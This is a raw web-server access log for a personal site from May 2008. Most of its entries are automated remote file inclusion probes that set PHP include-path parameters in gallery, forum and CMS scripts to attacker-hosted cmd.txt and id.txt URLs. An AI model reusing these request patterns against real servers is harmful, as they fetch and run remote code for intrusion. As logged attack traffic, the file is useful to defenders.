76.12.32.214 - - [25/May/2008:09:49:44 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:49:44 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:49:50 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:49:50 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:50:12 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:50:30 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:50:30 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:50:31 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:50:32 -0700] "GET /logs/access_080201.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:50:32 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:50:32 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:52:02 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:52:02 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.103.23.40 - - [25/May/2008:09:52:06 -0700] "GET /logs/access_080218.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.parcheggi.it/aziendaimg/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.127.253.224 - - [25/May/2008:09:52:12 -0700] "GET /logs/access_080225.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.127.253.224 - - [25/May/2008:09:52:14 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.6.155.217 - - [25/May/2008:09:52:15 -0700] "GET /logs//nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.6.155.217 - - [25/May/2008:09:52:15 -0700] "GET //nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.127.253.224 - - [25/May/2008:09:52:17 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:52:20 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:52:23 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:52:23 -0700] "GET /errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:52:24 -0700] "GET /logs/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:52:25 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:52:25 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:52:34 -0700] "GET /logs/access_080215.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.79.180 - - [25/May/2008:09:52:36 -0700] "GET /logs/access.log/index2.php?pagina=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.79.180 - - [25/May/2008:09:52:37 -0700] "GET /index2.php?pagina=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.79.180 - - [25/May/2008:09:52:37 -0700] "GET /logs/index2.php?pagina=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:52:37 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:52:39 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.22.9 - - [25/May/2008:09:52:52 -0700] "GET /logs//nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.22.9 - - [25/May/2008:09:52:53 -0700] "GET //nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:53:03 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.60.159.14 - - [25/May/2008:09:53:11 -0700] "GET //config/dbutil.bck.php?confdir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.60.159.14 - - [25/May/2008:09:53:13 -0700] "GET //config/dbutil.bck.php?confdir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.60.159.14 - - [25/May/2008:09:53:13 -0700] "GET //config/dbutil.bck.php?confdir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:53:26 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:53:26 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:53:26 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:53:27 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:53:30 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:53:30 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:53:30 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.22 - - [25/May/2008:09:53:42 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.22 - - [25/May/2008:09:53:42 -0700] "GET /bikes/?D=D HTTP/1.1" 200 2457 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.6.155.217 - - [25/May/2008:09:53:54 -0700] "GET /logs/access_071213.log//nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.6.155.217 - - [25/May/2008:09:53:54 -0700] "GET //nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.6.155.217 - - [25/May/2008:09:53:55 -0700] "GET /logs//nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:53:55 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.6.155.217 - - [25/May/2008:09:53:56 -0700] "GET /logs/access_080421.log//nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:53:59 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:53:59 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:53:59 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.173.45 - - [25/May/2008:09:54:01 -0700] "GET /book.php5?page=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:54:02 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.79.180 - - [25/May/2008:09:54:09 -0700] "GET /logs/access.log/index.php?pagina=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.79.180 - - [25/May/2008:09:54:13 -0700] "GET /index.php?pagina=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.79.180 - - [25/May/2008:09:54:14 -0700] "GET /logs/index.php?pagina=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:54:21 -0700] "GET /logs/access.log/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:54:24 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:54:28 -0700] "GET //component/option,com_sitemap/Itemid,36//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [25/May/2008:09:55:16 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [25/May/2008:09:55:16 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [25/May/2008:09:55:16 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:55:45 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.192.125.88 - - [25/May/2008:09:55:50 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.informacione.info/userimgs/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.192.125.88 - - [25/May/2008:09:55:51 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.informacione.info/userimgs/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.103.23.40 - - [25/May/2008:09:55:52 -0700] "GET /logs/access_080327.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.parcheggi.it/aziendaimg/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:56:05 -0700] "GET /logs/access_080215.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:56:05 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:56:05 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.12.151.34 - - [25/May/2008:09:57:05 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://kiliclub.com/tmp/cmd.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [25/May/2008:09:57:06 -0700] "GET /modules/My_eGallery/index.php?basepath=http://kiliclub.com/tmp/cmd.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
61.241.88.28 - - [25/May/2008:09:57:09 -0700] "GET /logs/access_071213.log//nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.241.88.28 - - [25/May/2008:09:57:09 -0700] "GET //nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.241.88.28 - - [25/May/2008:09:57:10 -0700] "GET /logs//nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.79.180 - - [25/May/2008:09:57:17 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.241.88.28 - - [25/May/2008:09:57:20 -0700] "GET /logs/access_080421.log//nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:57:32 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:57:34 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:57:38 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:57:38 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:57:38 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.195.37.180 - - [25/May/2008:09:57:59 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 1121402 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.108.67.176 - - [25/May/2008:09:58:27 -0700] "GET /logs/access_080404.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [25/May/2008:09:58:59 -0700] "GET /logs/access_080211.log/book.php5?page=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [25/May/2008:09:59:00 -0700] "GET /logs/book.php5?page=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:59:04 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:59:04 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:59:04 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:09:59:07 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:09:59:07 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:09:59:08 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [25/May/2008:09:59:53 -0700] "GET /index1.php?menu=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [25/May/2008:09:59:53 -0700] "GET /logs/index1.php?menu=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
82.78.216.197 - - [25/May/2008:10:00:01 -0700] "GET /logs/index.php?ort=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
82.78.216.197 - - [25/May/2008:10:00:03 -0700] "GET /index1.php?menu=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
82.78.216.197 - - [25/May/2008:10:00:05 -0700] "GET /index.php?ort=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 200 11606 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
77.79.246.200 - - [25/May/2008:10:00:11 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.79.246.200 - - [25/May/2008:10:00:11 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
201.12.151.34 - - [25/May/2008:10:00:46 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/DnL/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [25/May/2008:10:00:47 -0700] "GET /modules/My_eGallery/index.php?basepath=http://h1.ripway.com/DnL/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.75.158.23 - - [25/May/2008:10:01:14 -0700] "GET /logs/access_080215.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [25/May/2008:10:01:14 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [25/May/2008:10:01:15 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.12.151.34 - - [25/May/2008:10:01:20 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/DnL/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [25/May/2008:10:01:20 -0700] "GET /modules/My_eGallery/index.php?basepath=http://h1.ripway.com/DnL/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.87.191.61 - - [25/May/2008:10:01:34 -0700] "GET /logs/access_080215.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [25/May/2008:10:01:34 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [25/May/2008:10:01:34 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
92.48.65.154 - - [25/May/2008:10:01:45 -0700] "GET /logs/access_080215.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [25/May/2008:10:01:45 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [25/May/2008:10:01:45 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.180 - - [25/May/2008:10:01:50 -0700] "GET /logs/access.log HTTP/1.0" 200 124458 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:10:01:50 -0700] "GET //component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:10:02:01 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
